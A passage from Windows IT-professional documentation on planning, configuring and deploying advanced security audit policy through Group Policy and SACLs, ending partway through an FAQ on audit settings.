Read/Write on Corp- employee privacy
Finance-1
Departmental Payroll
Managers: Write only
on Corp-Finance-1
Patient medical MedRec-2 Doctors and Nurses: High Strict legal and
records Read/Write on regulatory standards
Med/Rec-2
Lab Assistants: Write
only on MedRec-2
Accounting: Read only
on MedRec-2
Consumer health Web-Ext-1 Public Relations Web Low Public education and
information Content Creators: corporate image
Read/Write on Web-
Ext-1
Public: Read only on
Web-Ext-1
Users
Many organizations find it useful to classify the types of users they have and base permissions on this
classification. This same classification can help you identify which user activities should be the subject of security
auditing and the amount of audit data they will generate.
Organizations can create distinctions based on the type of rights and permissions needed by users to perform
their jobs. For example, under the classification Administrators, larger organizations might assign local
administrator responsibilities for a single computer, for specific applications such as Exchange Server or SQL
Server, or for an entire domain. Under Users, permissions and Group Policy settings can apply to as many as all
users in an organization or as few as a subset of the employees in a given department.
Also, if your organization is subject to regulatory requirements, user activities such as accessing medical records or
financial data may need to be audited to verify that you are complying with these requirements.
To effectively audit user activity, begin by listing the different types of users in your organization and the types of
data they need access to—in addition to the data they should not have access to.
Also, if external users can access any of your organization's data, be sure to identify them, including if they belong
to a business partner, customer, or general user, the data they have access to, and the permissions they have to
access that data.
The following table illustrates an analysis of users on a network. Although our example contains a single column
titled "Possible auditing considerations," you may want to create additional columns to differentiate between
different types of network activity, such as logon hours and permission use.
GROUPS DATA POSSIBLE AUDITING CONSIDERATIONS

GROUPS DATA POSSIBLE AUDITING CONSIDERATIONS
Account administrators User accounts and security groups Account administrators have full
privileges to create new user accounts,
reset passwords, and modify security
group memberships. We need a
mechanism to monitor these changes.
Members of the Finance OU Financial records Users in Finance have Read/Write

access to critical financial records, but
no ability to change permissions on
these resources. These financial records
are subject to government regulatory
compliance requirements.
External partners Project Z Employees of partner organizations

have Read/Write access to certain
project data and servers relating to
Project Z, but not to other servers or
data on the network.
Computers
Security and auditing requirements and audit event volume can vary considerably for different types of computers
in an organization. These requirements can be based on:
If the computers are servers, desktop computers, or portable computers.
The important applications the computers run, such as Exchange Server, SQL Server, or Forefront Identity
Manager.
Note: If the server applications (including Exchange Server and SQL Server) have audit settings. For
more information about auditing in Exchange Server, see the Exchange 2010 Security Guide. For more
information about auditing in SQL Server 2008, see Auditing (Database Engine). For SQL Server 2012,
see SQL Server Audit (Database Engine).
The operating system versions.
Note: The operating system version determines which auditing options are available and the volume of
audit event data.
The business value of the data.

For example, a web server that is accessed by external users requires different audit settings than a root
certification authority (CA) that is never exposed to the public Internet or even to regular users on the
organization's network.
The following table illustrates an analysis of computers in an organization.
TYPE OF COMPUTER AND APPLICATIONS OPERATING SYSTEM VERSION WHERE LOCATED
Servers hosting Exchange Server Windows Server 2008 R2 ExchangeSrv OU
File servers Windows Server 2012 Separate resource OUs by department

and (in some cases) by location
TYPE OF COMPUTER AND APPLICATIONS OPERATING SYSTEM VERSION WHERE LOCATED
Portable computers Windows Vista and Windows 7 Separate portable computer OUs by
department and (in some cases) by
location
Web servers Windows Server 2008 R2 WebSrv OU
Regulatory requirements
Many industries and locales have strict and specific requirements for network operations and how resources are
protected. In the health care and financial industries, for example, there are strict guidelines for who has access to
records and how they are used. Many countries have strict privacy rules. To identify regulatory requirements, work
with your organization's legal department and other departments responsible for these requirements. Then
consider the security configuration and auditing options that can be used to comply with and verify compliance
with these regulations.
For more info, see the System Center Process Pack for IT GRC.
Mapping the security audit policy to groups of users, computers, and

resources in your organization
By using Group Policy, you can apply your security audit policy to defined groups of users, computers, and
resources. To map a security auditing policy to these defined groups in your organization, you should understand
the following considerations for using Group Policy to apply security audit policy settings:
The policy settings you identify can be applied by using one or more GPOs. To create and edit a GPO, use the
Group Policy Management Console (GPMC ). By using the GPMC to link a GPO to selected Active Directory
sites, domains, and OUs, you apply the policy settings in the GPO to the users and computers in those Active
Directory objects. An OU is the lowest-level Active Directory container to which you can assign Group Policy
settings.
For every policy setting that you select, you need to decide whether it should be enforced across the
organization, or whether it should apply only to selected users or computers. You can then combine these audit
policy settings into GPOs and link them to the appropriate Active Directory containers.
By default, options set in GPOs that are linked to higher levels of Active Directory sites, domains, and OUs
are inherited by all OUs at lower levels. However, a GPO that is linked at a lower level can overwrite
inherited policies.
For example, you might use a domain GPO to assign an organization-wide group of audit settings, but want
a certain OU to get a defined group of additional settings. To accomplish this, you can link a second GPO to
that specific lower-level OU. Therefore, a logon audit setting that is applied at the OU level will override a
conflicting logon audit setting that is applied at the domain level (unless you have taken special steps to
apply Group Policy loopback processing).
Audit policies are computer policies. Therefore, they must be applied through GPOs that are applied to
computer OUs, not to user OUs. However, in most cases you can apply audit settings for only specified
resources and groups of users by configuring SACLs on the relevant objects. This enables auditing for a
security group that contains only the users you specify.
For example, you could configure a SACL for a folder called Payroll Data on Accounting Server 1. This can
audit attempts by members of the Payroll Processors OU to delete objects from this folder. The Object
Access\Audit File System audit policy setting applies to Accounting Server 1, but because it requires a
corresponding resource SACL, only actions by members of the Payroll Processors OU on the Payroll Data
folder generates audit events.
Advanced security audit policy settings were introduced in Windows Server 2008 R2 or Windows 7 and
can be applied to those operating systems and later. These advanced audit polices can only be applied by
using Group Policy.
Important: Whether you apply advanced audit policies by using Group Policy or by using logon scripts,
do not use both the basic audit policy settings under Local Policies\Audit Policy and the advanced
settings under Security Settings\Advanced Audit Policy Configuration. Using both basic and
advanced audit policy settings can cause unexpected results in audit reporting.
If you use Advanced Audit Policy Configuration settings or use logon scripts to apply advanced audit
policies, be sure to enable the Audit: Force audit policy subcategory settings (Windows Vista or
later) to override audit policy category settings policy setting under Local Policies\Security
Options. This will prevent conflicts between similar settings by forcing basic security auditing to be
ignored.
The following are examples of how audit policies can be applied to an organization's OU structure:
Apply data activity settings to an OU that contains file servers. If your organization has servers that contain
particularly sensitive data, consider putting them in a separate OU so that you can configure and apply a more
precise audit policy to these servers.
Apply user activity audit policies to an OU that contains all computers in the organization. If your organization
places users in OUs based on the department they work in, consider configuring and applying more detailed
security permissions on critical resources that are accessed by employees who work in more sensitive areas,
such as network administrators or the legal department.
Apply network and system activity audit policies to OUs that contain the organization's most critical servers,
such as domain controllers, CAs, email servers, or database servers.
Mapping your security auditing goals to a security audit policy

configuration
After you identify your security auditing goals, you can begin to map them to a security audit policy configuration.
This audit policy configuration must address your most critical security auditing goals, but it also must address
your organization's constraints, such as the number of computers that need to be monitored, the number of
activities that you want to audit, the number of audit events that your desired audit configuration will generate,
and the number of administrators available to analyze and act upon audit data.
To create your audit policy configuration, you need to:
1. Explore all of the audit policy settings that can be used to address your needs.
2. Choose the audit settings that will most effectively address the audit requirements identified in the previous
section.
3. Confirm that the settings you choose are compatible with the operating systems running on the computers that
you want to monitor.
4. Decide which configuration options (Success, Failure, or both Success and Failure) you want to use for the audit
settings.
5. Deploy the audit settings in a lab or test environment to verify that they meet your desired results in terms of
volume, supportability, and comprehensiveness. Then deploy the audit settings in a pilot production
environment to ensure that your estimates of how much audit data your audit plan will generate are realistic
and that you can manage this data.
Exploring audit policy options
Security audit policy settings in the supported versions of Windows can be viewed and configured in the following
locations:
Security Settings\Local Policies\Audit Policy.
Security Settings\Local Policies\Security Options.
Security Settings\Advanced Audit Policy Configuration. For more information, see Advanced security
audit policy settings.
Choosing audit settings to use
Depending on your goals, different sets of audit settings may be of particular value to you. For example, some
settings under Security Settings\Advanced Audit Policy Configuration can be used to monitor the following
types of activity:
Data and resources
Users
Network
Important: Settings that are described in the Reference might also provide valuable information about activity
audited by another setting. For example, the settings used to monitor user activity and network activity have
obvious relevance to protecting your data resources. Likewise, attempts to compromise data resources have
huge implications for overall network status, and potentially for how well you are managing the activities of
users on the network.
Data and resource activity

For many organizations, compromising the organization's data resources can cause tremendous financial losses, in
addition to lost prestige and legal liability. If your organization has critical data resources that need to be protected
against any breach, the following settings can provide extremely valuable monitoring and forensic data:
Object Access\Audit File Share. This policy setting allows you to track what content was accessed, the source
(IP address and port) of the request, and the user account that was used for the access. The volume of event
data generated by this setting will vary depending on the number of client computers that attempt to access the
file share. On a file server or domain controller, volume may be high due to SYSVOL access by client
computers for policy processing. If you do not need to record routine access by client computers that have
permissions on the file share, you may want to log audit events only for failed attempts to access the file share.
Object Access\Audit File System. This policy setting determines whether the operating system audits user
attempts to access file system objects. Audit events are only generated for objects (such as files and folders)
that have configured SACLs, and only if the type of access requested (such as Write, Read, or Modify) and
the account that is making the request match the settings in the SACL.
If success auditing is enabled, an audit entry is generated each time any account successfully accesses a file
system object that has a matching SACL. If failure auditing is enabled, an audit entry is generated each time
any user unsuccessfully attempts to access a file system object that has a matching SACL. The amount of
audit data generated by the Audit File System policy setting can vary considerably, depending on the
number of objects that have been configured to be monitored.
Note: To audit user attempts to access all file system objects on a computer, use the Global Object
Access Auditing settings Registry (Global Object Access Auditing) or File System (Global Object Access
Auditing).
Object Access\Audit Handle Manipulation. This policy setting determines whether the operating system
generates audit events when a handle to an object is opened or closed. Only objects with configured SACLs
generate these events, and only if the attempted handle operation matches the SACL.
Event volume can be high, depending on how SACLs are configured. When used together with the Audit
File System or Audit Registry policy settings, the Audit Handle Manipulation policy setting can
provide an administrator with useful "reason for access" audit data that details the precise permissions on
which the audit event is based. For example, if a file is configured as a Read-only resource but a user
attempts to save changes to the file, the audit event will log not only the event, but also the permissions that
were used (or attempted to be used) to save the file changes.
Global Object Access Auditing. A growing number of organizations are using security auditing to
comply with regulatory requirements that govern data security and privacy. But demonstrating that strict
controls are being enforced can be extremely difficult. To address this issue, the supported versions of
Windows include two Global Object Access Auditing policy settings, one for the registry and one for the
file system. When you configure these settings, they apply a global system access control SACL on all
objects of that class on a system, which cannot be overridden or circumvented.
Important: The Global Object Access Auditing policy settings must be configured and applied in
conjunction with the Audit File System and Audit Registry audit policy settings in the Object Access
category.
User activity
The settings in the previous section relate to activity involving the files, folders, and network shares that are stored
on a network, and the settings in this section focus on the users, including employees, partners, and customers,
who may try to access those resources.
In the majority of cases, these attempts will be legitimate and a network needs to make vital data readily available
to legitimate users. However in other cases, employees, partners, and others may attempt to access resources that
they have no legitimate reason to access. Security auditing can be used to track a wide variety of user activities on
a particular computer to diagnose and resolve problems for legitimate users and identify and address illegitimate
activities. The following are a few important settings that you should evaluate to track user activity on your
network:
Account Logon\Audit Credential Validation. This is an extremely important policy setting because it enables
you to track every successful and unsuccessful attempt to present credentials for a user logon. In particular, a
pattern of unsuccessful attempts may indicate that a user or application is using credentials that are no longer
valid, or attempting to use a variety of credentials in succession in hope that one of these attempts will
eventually be successful. These events occur on the computer that is authoritative for the credentials. For
domain accounts, the domain controller is authoritative. For local accounts, the local computer is authoritative.
Detailed Tracking\Audit Process Creation and Detailed Tracking\Audit Process Termination. These policy
settings can enable you to monitor the applications that a user opens and closes on a computer.
DS Access\Audit Directory Service Access and DS Access\Audit Directory Service Changes. These policy
settings provide a detailed audit trail of attempts to access create, modify, delete, move, or undelete objects in
Active Directory Domain Services (AD DS ). Only domain administrators have permissions to modify AD DS
objects, so it is extremely important to identify malicious attempts to modify these objects. In addition, although
domain administrators should be among an organization's most trusted employees, the use of Audit
Directory Service Access and Audit Directory Service Changes settings allow you to monitor and verify
that only approved changes are made to AD DS. These audit events are logged only on domain controllers.
Logon/Logoff\Audit Account Lockout. Another common security scenario occurs when a user attempts to log
on with an account that has been locked out. It is important to identify these events and to determine whether
the attempt to use an account that has been locked out is malicious.
Logon/Logoff\Audit Logoff and Logon/Logoff\Audit Logon. Logon and logoff events are essential to
tracking user activity and detecting potential attacks. Logon events are related to the creation of logon
sessions, and they occur on the computer that was accessed. For an interactive logon, events are generated
on the computer that was logged on to. For network logon, such as accessing a shared resource, events are
generated on the computer that hosts the resource that was accessed. Logoff events are generated when
logon sessions are terminated.
Note: There is no failure event for logoff activity because failed logoffs (such as when a system abruptly
shuts down) do not generate an audit record. Logoff events are not 100 percent reliable. For example,
the computer can be turned off without a proper logoff and shutdown, and a logoff event is not
generated.
Logon/Logoff\Audit Special Logon. A special logon has administrator-equivalent rights and can be used to
elevate a process to a higher level. It is recommended to track these types of logons. For more information
about this feature, see article 947223 in the Microsoft Knowledge Base.
Object Access\Audit Certification Services. This policy setting allows you to track and monitor a wide variety of
activities on a computer that hosts Active Directory Certificate Services (AD CS ) role services to ensure that
only authorized users are performing or attempting to perform these tasks, and that only authorized or desired
tasks are being performed.
Object Access\Audit File System and Object Access\Audit File Share. These policy settings are described in the
previous section.
Object Access\Audit Handle Manipulation. This policy setting and its role in providing "reason for access" audit
data is described in the previous section.
Object Access\Audit Registry. Monitoring for changes to the registry is one of the most critical means that
an administrator has to ensure malicious users do not make changes to essential computer settings. Audit
events are only generated for objects that have configured SACLs, and only if the type of access that is
requested (such as Write, Read, or Modify) and the account making the request match the settings in the
SACL.
Important: On critical systems where all attempts to change registry settings need to be tracked, you
can combine the Audit Registry policy setting with the Global Object Access Auditing policy
settings to ensure that all attempts to modify registry settings on a computer are tracked.
Object Access\Audit SAM. The Security Accounts Manager (SAM ) is a database that is present on
computers running Windows that stores user accounts and security descriptors for users on the local
computer. Changes to user and group objects are tracked by the Account Management audit category.
However, user accounts with the proper user rights could potentially alter the files where the account and
password information is stored in the system, bypassing any Account Management events.
Privilege Use\Audit Sensitive Privilege Use. Privilege Use policy settings and audit events allow you to track
the use of certain rights on one or more systems. If you configure this policy setting, an audit event is
generated when sensitive rights requests are made.
Network activity
The following network activity policy settings allow you to monitor security-related issues that are not necessarily
covered in the data or user activity categories, but that can be equally important for network status and protection.
Account Management. The policy settings in this category can be used to track attempts to create, delete, or
modify user or computer accounts, security groups, or distribution groups. Monitoring these activities
complements the monitoring strategies you select in the user activity and data activity sections.
Account Logon\Audit Kerberos Authentication Service and Account Logon\Audit Kerberos Service Ticket
Operations. Audit policy settings in the Account Logon category monitor activities that relate to the use of
domain account credentials. These policy settings complement the policy settings in the Logon/Logoff
category. The Audit Kerberos Authentication Service policy setting allows you to monitor the status of
and potential threats to the Kerberos service. The Audit Kerberos Service Ticket Operations policy
setting allows you to monitor the use of Kerberos service tickets.
Note: Account Logon policy settings apply only to specific domain account activities, regardless of the
computer that is accessed, whereas Logon/Logoff policy settings apply to the computer that hosts the
resources being accessed.
Account Logon\Audit Other Account Logon Events. This policy setting can be used to track a number of
different network activities, including attempts to create Remote Desktop connections, wired network
connections, and wireless connections.
DS Access. Policy settings in this category allow you to monitor the AD DS role services, which provide
account data, validate logons, maintain network access permissions, and provide other services that are critical
to the secure and proper functioning of a network. Therefore, auditing the rights to access and modify the
configuration of a domain controller can help an organization maintain a secure and reliable network. In
addition, one of the key tasks performed by AD DS is the replication of data between domain controllers.
Logon/Logoff\Audit IPsec Extended Mode, Logon/Logoff\Audit IPsec Main Mode, and Logon/Logoff\Audit
IPsec Quick Mode. Many networks support large numbers of external users, including remote employees and
partners. Because these users are outside the organization's network boundaries, IPsec is often used to help
protect communications over the Internet by enabling network-level peer authentication, data origin
authentication, data integrity, data confidentiality (encryption), and protection against replay attacks. You can
use these settings to ensure that IPsec services are functioning properly.
Logon/Logoff\Audit Network Policy Server. Organizations that use RADIUS (IAS ) and Network Access
Protection (NAP ) to set and maintain security requirements for external users can use this policy setting to
monitor the effectiveness of these policies and to determine whether anyone is attempting to circumvent these
protections.
Policy Change. These policy settings and events allow you to track changes to important security policies on a
local computer or network. Because policies are typically established by administrators to help secure network
resources, any changes or attempts to change these policies can be an important aspect of security
management for a network.
Policy Change\Audit Audit Policy Change. This policy setting allows you to monitor changes to the audit policy.
If malicious users obtain domain administrator credentials, they can temporarily disable essential security audit
policy settings so that their other activities on the network cannot be detected.
Policy Change\Audit Filtering Platform Policy Change. This policy setting can be used to monitor a large variety
of changes to an organization's IPsec policies.
Policy Change\Audit MPSSVC Rule-Level Policy Change. This policy setting determines if the operating
system generates audit events when changes are made to policy rules for the Microsoft Protection Service
(MPSSVC.exe), which is used by Windows Firewall. Changes to firewall rules are important for understanding
the security state of the computer and how well it is protected against network attacks.
Confirm operating system version compatibility
Not all versions of Windows support advanced audit policy settings or the use of Group Policy to apply and
manage these settings. For more info, see Which editions of Windows support advanced audit policy
configuration.
The audit policy settings under Local Policies\Audit Policy overlap with audit policy settings under Security
Settings\Advanced Audit Policy Configuration. However, the advanced audit policy categories and
subcategories make it possible to focus your auditing efforts on the most critical activities while reducing the
amount of audit data that is less important to your organization.
For example, Local Policies\Audit Policy contains a single setting called Audit account logon events. When this
setting is configured, it generates at least 10 types of audit events.
In comparison, the Account Logon category under Security Settings\Advanced Audit Policy Configuration
provides the following advanced settings, which allow you to focus your auditing:
Credential Validation
Kerberos Authentication Service
Kerberos Service Ticket Operations
Other Account Logon Events
These settings allow you to exercise much tighter control over which activities or events generate event data.
Some activities and events will be more important to your organization, so define the scope of your security audit
policy as narrowly as possible.
Success, failure, or both
Whichever event settings you include in your plan, you also have to decide whether you want to log an event when
the activity fails, when an activity succeeds, or both successes and failures. This is an important question, and the
answer will be based on the criticality of the event and the implications of the decision on event volume.
For example, on a file server that is accessed frequently by legitimate users, you may be interested in logging an
event only when an unsuccessful attempt to access data takes place, because this could be evidence of an
unauthorized or malicious user. And in this instance, logging successful attempts to access the server would
quickly fill the event log with benign events.
On the other hand, if the file share has extremely sensitive and valuable information, such as trade secrets, you
may want to log every access attempt, whether successful or unsuccessful, so that you have an audit trail of every
user who accessed the resource.
Planning for security audit monitoring and management

Networks can contain hundreds of servers running critical services or storing critical data, all of which need to be
monitored. The number of client computers on the network can easily range into the tens or even hundreds of
thousands. This may not be an issue if the ratio of servers or client computers per administrator is low. Even if an
administrator who is responsible for auditing security and performance issues has relatively few computers to
monitor, you need to decide how an administrator will obtain event data to review. Following are some options for
obtaining the event data.
Will you keep event data on a local computer until an administrator logs on to review this data? If so, then the
administrator needs to have physical or remote access to the Event Viewer on each client computer or server,
and the remote access and firewall settings on each client computer or server need to be configured to enable
this access. In addition, you need to decide how often an administrator can visit each computer, and adjust the
size of the audit log so that critical information is not deleted if the log reaches its maximum capacity.
Will you collect event data so that it can be reviewed from a central console? If so, there are a number of
computer management products, such as the Audit Collection Services in Operations Manager 2007 and 2012,
which can be used to collect and filter event data. Presumably this solution enables a single administrator to
review larger amounts of data than using the local storage option. But in some cases, this can make it more
difficult to detect clusters of related events that can occur on a single computer.
In addition, whether you choose to leave audit data on an individual computer or consolidate it at a central
location, you need to decide how large the log file should be and what should happen when the log reaches its
maximum size. To configure these options, open Event Viewer, expand Windows Logs, right-click Security, and
click Properties. You can configure the following properties:
Overwrite events as needed (oldest events first). This is the default option, which is an acceptable solution
in most situations.
Archive the log when full, do not overwrite events. This option can be used when all log data needs to be
saved, but it also suggests that you may not be reviewing audit data frequently enough.
Do not overwrite events (Clear logs manually). This option stops the collection of audit data when the log
file reaches its maximum size. Older data is retained at the expense of the most recent audit events. Use this
option only if you do not want to lose any audit data, do not want to create an archive of the event log, and are
committed to reviewing data before the maximum log size is reached.
You can also configure the audit log size and other key management options by using Group Policy settings. You
can configure the event log settings in the following locations within the GPMC: Computer
Configuration\Administrative Templates\Windows Components\Event Log Service\Security. These
options include:
Maximum Log Size (KB ). This policy setting specifies the maximum size of the log files. The user
interfaces in the Local Group Policy Editor and Event Viewer allow you to enter values as large as 2 TB. If
this setting is not configured, event logs have a default maximum size of 20 megabytes.
Log Access. This policy setting determines which user accounts have access to log files and what usage
rights are granted.
Retain old events. This policy setting controls event log behavior when the log file reaches its maximum size.
When this policy setting is enabled and a log file reaches its maximum size, new events are not written to the
log and are lost. When this policy setting is disabled and a log file reaches its maximum size, new events
overwrite old events.
Backup log automatically when full. This policy setting controls event log behavior when the log file
reaches its maximum size and takes effect only if the Retain old events policy setting is enabled. If you enable
these policy settings, the event log file is automatically closed and renamed when it is full. A new file is then
started. If you disable or do not configure this policy setting and the Retain old events policy setting is
enabled, new events are discarded and the old events are retained.
In addition, a growing number of organizations are being required to store archived log files for a number of
years. You should consult with regulatory compliance officers in your organization to determine whether such
guidelines apply to your organization. For more information, see the IT Compliance Management Guide.
Deploying the security audit policy

Before deploying the audit policy in a production environment, it is critical that you determine the effects of the
policy settings that you have configured. The first step in assessing your audit policy deployment is to create a test
environment in a lab and use it to simulate the various use scenarios that you have identified to confirm that the
audit settings you have selected are configured correctly and generate the type of results you intend.
However, unless you are able to run fairly realistic simulations of network usage patterns, a lab setup cannot
provide you with accurate information about the volume of audit data that the audit policy settings you selected
will generate and how effective your plan for monitoring audit data will be. To provide this type of information, you
need to conduct one or more pilot deployments. These pilot deployments could involve:
A single OU that contains critical data servers or an OU that contains all desktop computers in a specified
location.
A limited set of security audit policy settings, such as Logon/Logoff and Account Logon.
A combination of limited OUs and audit policy settings—for example, targeting servers in only the Accounting
OU with Object Access policy settings.
After you have successfully completed one or more limited deployments, you should confirm that the audit data
that is collected is manageable with your management tools and administrators. When you have confirmed that
the pilot deployment is effective, you need to confirm that you have the necessary tools and staff to expand the
deployment to include additional OUs and sets of audit policy settings until the production deployment is
complete.
Advanced security auditing FAQ
Applies to
Windows 10
This topic for the IT professional lists questions and answers about understanding, deploying, and managing
security audit policies.
What is Windows security auditing and why might I want to use it?
What is the difference between audit policies located in Local Policies\Audit Policy and audit policies located in
Advanced Audit Policy Configuration?
What is the interaction between basic audit policy settings and advanced audit policy settings?
How are audit settings merged by Group Policy?
What is the difference between an object DACL and an object SACL?
Why are audit policies applied on a per-computer basis rather than per user?
What are the differences in auditing functionality between versions of Windows?
Can I use advanced audit policy from a domain controller running Windows Server 2003 or Windows 2000
Server?
What is the difference between success and failure events? Is something wrong if I get a failure audit?
How can I set an audit policy that affects all objects on a computer?
How do I figure out why someone was able to access a resource?
How do I know when changes are made to access control settings, by whom, and what the changes were?
How can I roll back security audit policies from the advanced audit policy to the basic audit policy?
How can I monitor if changes are made to audit policy settings?
How can I minimize the number of events that are generated?
What are the best tools to model and manage audit policy?
Where can I find information about all the possible events that I might receive?
Where can I find more detailed information?
What is Windows security auditing and why might I want to use it?
Security auditing is a methodical examination and review of activities that may affect the security of a system. In
the Windows operating systems, security auditing is more narrowly defined as the features and services that
enable an administrator to log and review events for specified security-related activities.
Hundreds of events occur as the Windows operating system and the applications that run on it perform their tasks.
Monitoring these events can provide valuable information to help administrators troubleshoot and investigate
security-related activities.
What is the difference between audit policies located in Local

Policies\Audit Policy and audit policies located in Advanced Audit
Policy Configuration?
The basic security audit policy settings in Security Settings\Local Policies\Audit Policy and the advanced
security audit policy settings in Security Settings\Advanced Audit Policy Configuration\System Audit
Policies appear to overlap, but they are recorded and applied differently. When you apply basic audit policy
settings to the local computer by using the Local Security Policy snap-in (secpol.msc), you are editing the effective
audit policy, so changes made to basic audit policy settings will appear exactly as configured in Auditpol.exe.
There are a number of additional differences between the security audit policy settings in these two locations.
There are nine basic audit policy settings under Security Settings\Local Policies\Audit Policy and settings
under Advanced Audit Policy Configuration. The settings available in Security Settings\Advanced Audit
Policy Configuration address similar issues as the nine basic settings in Local Policies\Audit Policy, but they
allow administrators to be more selective in the number and types of events to audit. For example, the basic audit
policy provides a single setting for account logon, and the advanced audit policy provides four. Enabling the single
basic account logon setting would be the equivalent of setting all four advanced account logon settings. In
comparison, setting a single advanced audit policy setting does not generate audit events for activities that you are
not interested in tracking.
In addition, if you enable success auditing for the basic Audit account logon events setting, only success events
will be logged for all account logon–related behaviors. In comparison, depending on the needs of your
organization, you can configure success auditing for one advanced account logon setting, failure auditing for a
second advanced account logon setting, success and failure auditing for a third advanced account logon setting, or
no auditing.
The nine basic settings under Security Settings\Local Policies\Audit Policy were introduced in Windows 2000.
Therefore, they are available in all versions of Windows released since then. The advanced audit policy settings
were introduced in Windows Vista and Windows Server 2008. The advanced settings can only be used on
computers running Windows 7, Windows Server 2008, and later.
What is the interaction between basic audit policy settings and

advanced audit policy settings?
Basic audit policy settings are not compatible with advanced audit policy settings that are applied by using Group
Policy. When advanced audit policy settings are applied by using Group Policy, the current computer's audit policy
settings are cleared before the resulting advanced audit policy settings are applied. After you apply advanced audit
policy settings by using Group Policy, you can only reliably set system audit policy for the computer by using the
advanced audit policy settings.
Editing and applying the advanced audit policy settings in Local Security Policy modifies the local Group Policy
Object (GPO ), so changes made here may not be exactly reflected in Auditpol.exe if there are policies from other
domain GPOs or logon scripts. Both types of policies can be edited and applied by using domain GPOs, and these
settings will override any conflicting local audit policy settings. However, because the basic audit policy is recorded
in the effective audit policy, that audit policy must be explicitly removed when a change is desired, or it will remain
in the effective audit policy. Policy changes that are applied by using local or domain Group Policy settings are
reflected as soon as the new policy is applied.
Important Whether you apply advanced audit policies by using Group Policy or by using logon scripts, do not
use both the basic audit policy settings under Local Policies\Audit Policy and the advanced settings under
Security Settings\Advanced Audit Policy Configuration. Using both advanced and basic audit policy
settings can cause unexpected results in audit reporting.
If you use Advanced Audit Policy Configuration settings or use logon scripts to apply advanced audit policies, be
sure to enable the Audit: Force audit policy subcategory settings (Windows Vista or later) to override
audit policy category settings policy setting under Local Policies\Security Options. This will prevent conflicts
between similar settings by forcing basic security auditing to be ignored.
How are audit settings merged by Group Policy?

By default, policy options that are set in GPOs and linked to higher levels of Active Directory sites, domains, and
OUs are inherited by all OUs at lower levels. However, an inherited policy can be overridden by a GPO that is
linked at a lower level.
For example, you might use a domain GPO to assign an organization-wide group of audit settings, but want a
certain OU to get a defined group of additional settings. To accomplish this, you can link a second GPO to that
specific lower-level OU. Therefore, a logon audit setting that is applied at the OU level will override a conflicting
logon audit setting that is applied at the domain level (unless you have taken special steps to apply Group Policy
loopback processing).
The rules that govern how Group Policy settings are applied propagate to the subcategory level of audit policy
settings. This means that audit policy settings configured in different GPOs will be merged if no policy settings
configured at a lower level exist. The following table illustrates this behavior.
SETTING CONFIGURED IN A
SETTING CONFIGURED IN AN DOMAIN GPO (LOWER RESULTING POLICY FOR THE
AUDITING SUBCATEGORY OU GPO (HIGHER PRIORITY) PRIORITY) TARGET COMPUTER
Detailed File Share Auditing Success Failure Success
Process Creation Auditing Disabled Success Disabled
Logon Auditing Success Failure Failure
What is the difference between an object DACL and an object SACL?

All objects in Active Directory Domain Services (AD DS ), and all securable objects on a local computer or on the
network, have security descriptors to help control access to the objects. Security descriptors include information
about who owns an object, who can access it and in what way, and what types of access are audited. Security
descriptors contain the access control list (ACL ) of an object, which includes all of the security permissions that
apply to that object. An object's security descriptor can contain two types of ACLs:
A discretionary access control list (DACL ) that identifies the users and groups who are allowed or denied access
A system access control list (SACL ) that controls how access is audited
The access control model that is used in Windows is administered at the object level by setting different levels of
access, or permissions, to objects. If permissions are configured for an object, its security descriptor contains a
DACL with security identifiers (SIDs) for the users and groups that are allowed or denied access.
If auditing is configured for the object, its security descriptor also contains a SACL that controls how the security
subsystem audits attempts to access the object. However, auditing is not completely configured unless a SACL has
been configured for an object and a corresponding Object Access audit policy setting has been configured and
applied.
Why are audit policies applied on a per-computer basis rather than per
user?
In security auditing in Windows, the computer, objects on the computer, and related resources are the primary
recipients of actions by clients including applications, other computers, and users. In a security breach, malicious
users can use alternate credentials to hide their identity, or malicious applications can impersonate legitimate users
to perform undesired tasks. Therefore, the most consistent way to apply an audit policy is to focus on the computer
and the objects and resources on that computer.
In addition, because audit policy capabilities can vary between computers running different versions of Windows,
the best way to ensure that the audit policy is applied correctly is to base these settings on the computer instead of
the user.
However, in cases where you want audit settings to apply only to specified groups of users, you can accomplish
this by configuring SACLs on the relevant objects to enable auditing for a security group that contains only the
users you specify. For example, you can configure a SACL for a folder called Payroll Data on Accounting Server 1.
This can audit attempts by members of the Payroll Processors OU to delete objects from this folder. The Object
Access\Audit File System audit policy setting applies to Accounting Server 1, but because it requires a
corresponding resource SACL, only actions by members of the Payroll Processors OU on the Payroll Data folder
generates audit events.
What are the differences in auditing functionality between versions of

Windows?
Basic audit policy settings are available in all versions of Windows since Windows 2000, and they can be applied
locally or by using Group Policy. Advanced audit policy settings were introduced in Windows Vista and Windows
Server 2008, but the settings can only be applied by using logon scripts in those versions. Advanced audit policy
settings, which were introduced in Windows 7 and Windows Server 2008 R2, can be configured and applied by
using local and domain Group Policy settings.
Can I use advanced audit policies from a domain controller running

Windows Server 2003 or Windows 2000 Server?
To use advanced audit policy settings, your domain controller must be installed on a computer running Windows
Server 2012 R2, Windows Server 2012, Windows Server 2008 R2, Windows Server 2008, or Windows Server
2003 with Service Pack 2 (SP2). Windows 2000 Server is not supported.
What is the difference between success and failure events? Is

something wrong if I get a failure audit?
A success audit event is triggered when a defined action, such as accessing a file share, is completed successfully.
A failure audit event is triggered when a defined action, such as a user logon, is not completed successfully.
The appearance of failure audit events in the event log does not necessarily mean that something is wrong with
your system. For example, if you configure Audit Logon events, a failure event may simply mean that a user
mistyped his or her password.
How can I set an audit policy that affects all objects on a computer?
System administrators and auditors increasingly want to verify that an auditing policy is applied to all objects on a
system. This has been difficult to accomplish because the system access control lists (SACLs) that govern auditing
are applied on a per-object basis. Thus, to verify that an audit policy has been applied to all objects, you would have
to check every object to be sure that no changes have been made—even temporarily to a single SACL. Introduced
in Windows Server 2008 R2 and Windows 7, security auditing allows administrators to define global object access
auditing policies for the entire file system or for the registry on a computer. The specified SACL is then
automatically applied to every object of that type. This can be useful for verifying that all critical files, folders, and
registry settings on a computer are protected, and for identifying when an issue with a system resource occurs. If a
file or folder SACL and a global object access auditing policy (or a single registry setting SACL and a global object
access auditing policy) are configured on a computer, the effective SACL is derived from combining the file or
folder SACL and the global object access auditing policy. This means that an audit event is generated if an activity
matches either the file or folder SACL or the global object access auditing policy.
How do I figure out why someone was able to access a resource?

Often it is not enough to know simply that an object such as a file or folder was accessed. You may also want to
know why the user was able to access this resource. You can obtain this forensic data by configuring the Audit
Handle Manipulation setting with the Audit File System or with the Audit Registry audit setting.
How do I know when changes are made to access control settings, by

whom, and what the changes were?
To track access control changes on computers running Windows Server 2016, Windows Server 2012 R2, Windows
